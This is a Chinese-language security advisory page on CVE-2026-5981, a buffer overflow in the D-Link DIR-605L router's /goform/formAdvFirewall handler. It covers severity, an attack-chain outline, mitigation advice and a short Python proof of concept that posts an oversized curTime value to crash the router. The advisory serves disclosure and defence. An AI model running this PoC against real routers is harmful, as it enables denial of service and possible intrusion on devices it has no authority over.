IPBUF安全漏洞报告
English
CVE-2026-5981 CVSS 8.8 高危

CVE-2026-5981 D-Link DIR-605L 缓冲区溢出漏洞

披露日期: 2026-04-09
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5981
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR-605L

相关标签

缓冲区溢出D-LinkDIR-605L远程代码执行RCE路由器漏洞

漏洞概述

D-Link DIR-605L路由器固件2.13B01存在高危缓冲区溢出漏洞。该漏洞位于/goform/formAdvFirewall处理函数中,源于对curTime参数的校验不严。攻击者可远程发送恶意请求触发溢出,导致设备崩溃或执行任意代码。由于厂商已停止支持且利用代码公开,该风险极高,建议用户立即更换设备或进行网络隔离。

技术细节

该漏洞的本质是典型的缓冲区溢出漏洞。在D-Link DIR-605L的Web服务器组件中,/goform/formAdvFirewall接口用于处理高级防火墙设置的POST请求。当该接口接收curTime参数时,程序调用了不安全的字符串拷贝函数(如strcpy),未对输入数据的长度进行边界检查。攻击者可以通过发送包含超长curTime参数值的POST请求,覆盖栈上的返回地址或其他关键控制结构。由于该服务通常以root权限运行,成功利用该漏洞可能导致远程代码执行(RCE)或拒绝服务(DoS)。攻击无需用户交互,仅需网络可达性即可发起,危害极大。

攻击链分析

STEP 1
侦察阶段
攻击者扫描网络,识别目标D-Link DIR-605L设备的IP地址及开放的Web管理端口(通常为80/443)。
STEP 2
漏洞利用
攻击者向目标设备的/goform/formAdvFirewall接口发送特制的POST请求,其中包含超长的curTime参数值以触发缓冲区溢出。
STEP 3
载荷执行与控制
溢出成功覆盖返回地址,CPU跳转到攻击者控制的恶意代码区域,执行Shellcode或导致设备重启(DoS)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target IP address target_ip = "192.168.0.1" url = f"http://{target_ip}/goform/formAdvFirewall" # Malicious payload to trigger buffer overflow # Adjust length based on specific buffer size analysis payload_data = { "curTime": "A" * 1000 # Sending a long string to overflow the buffer } try: print(f"[*] Sending exploit request to {url}...") response = requests.post(url, data=payload_data) print("[+] Request sent successfully.") print(f"[*] Response status code: {response.status_code}") print("[*] Check if the device has crashed or rebooted.") except Exception as e: print(f"[-] Error occurred: {e}")

影响范围

D-Link DIR-605L 2.13B01

防御指南

临时缓解措施
由于该产品已停止官方支持,不存在官方补丁。建议立即更换设备。若暂时无法更换,务必将其置于局域网内部,禁止从互联网访问其管理界面,并限制局域网内对路由器的访问权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表